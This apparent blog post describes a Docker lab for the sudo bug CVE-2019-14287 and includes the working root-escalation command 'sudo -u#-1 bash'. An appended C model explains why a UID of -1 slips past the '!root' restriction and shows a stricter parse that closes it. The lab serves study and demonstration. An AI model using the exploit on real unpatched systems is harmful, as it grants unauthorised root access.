I wanted to experiment with the new Sudo security bug recently released (CVE-2019-14287), so I created a quick Docker container to spin up an environment with different users and a vulnerable version. I posted the code for this on GitHub.
This container can be run with:
docker run -ti cashwilliams/cve-2019-14287-demo
The container has three real users:
The alice user is configured to be able to run any command as any other user (in this case bob, as it is the only other user) using sudo -u(user) (command), but is restricted from running commands as root. This is configured at the end of the /etc/sudoers file using:
alice ALL=(ALL,!root) NOPASSWD: ALL
You can try to run commands as bob, such as opening a shell, with the following:
sudo -ubob bash
However, if you attempt to run a command as root, you will be prompted for a password which is unknown (and the command would fail anyway). This is by design and shows the sudo command working properly.
The "minus_1_uid" bug within sudo was published on October 14, 2019 and demonstrates an issue with how the user argument is interpreted.
In this case alice can run commands as the root user, such as opening a shell, with the following:
sudo -u#-1 bash
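
Why #-1 gets past the !root restriction, as an added example that is not from the original post or from sudo's source: a small C model in which the requested UID is first checked against the Runas list and only afterwards applied with setresuid()-style semantics, where -1 means "no change" for a process that is already running as UID 0. The function names and the strict flag are hypothetical, and the model assumes Linux's 32-bit unsigned uid_t.

```c
/* Added illustration: a simplified model of the -u "#uid" handling, not sudo's source. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>

#define NO_CHANGE ((uid_t)-1) /* setresuid(2) treats -1 as "leave this ID unchanged" */
#define REFUSED   (-1LL)

/* Parse "#<number>". strict=0 accepts any integer; strict=1 rejects -1-like values. */
static int parse_uid(const char *arg, int strict, uid_t *out) {
    char *end;
    if (arg[0] != '#') return -1;
    errno = 0;
    long long v = strtoll(arg + 1, &end, 10);
    if (errno != 0 || end == arg + 1 || *end != '\0') return -1;
    if (strict && (v < 0 || v >= (long long)NO_CHANGE)) return -1;
    *out = (uid_t)v; /* lenient path: -1 becomes the NO_CHANGE sentinel */
    return 0;
}

/* Runas list (ALL,!root) from the sudoers line: any target except UID 0. */
static int runas_allowed(uid_t target) { return target != 0; }

/* setresuid() semantics for a process whose current UID is `current`. */
static uid_t uid_after_switch(uid_t current, uid_t target) {
    return target == NO_CHANGE ? current : target;
}

/* UID the command ends up running as, or REFUSED. sudo itself starts as UID 0. */
long long effective_uid_for(const char *arg, int strict) {
    uid_t target;
    if (parse_uid(arg, strict, &target) != 0 || !runas_allowed(target))
        return REFUSED;
    return (long long)uid_after_switch(0, target);
}

int main(void) {
    const char *args[] = { "#1001", "#0", "#-1" }; /* constructed sample inputs */
    for (size_t i = 0; i < sizeof args / sizeof args[0]; i++)
        printf("%-6s lenient=%lld strict=%lld\n", args[i],
               effective_uid_for(args[i], 0), effective_uid_for(args[i], 1));
    return 0;
}
```

In the lenient path "#0" is refused by the Runas check while "#-1" passes it and still ends up as UID 0; the strict path refuses both.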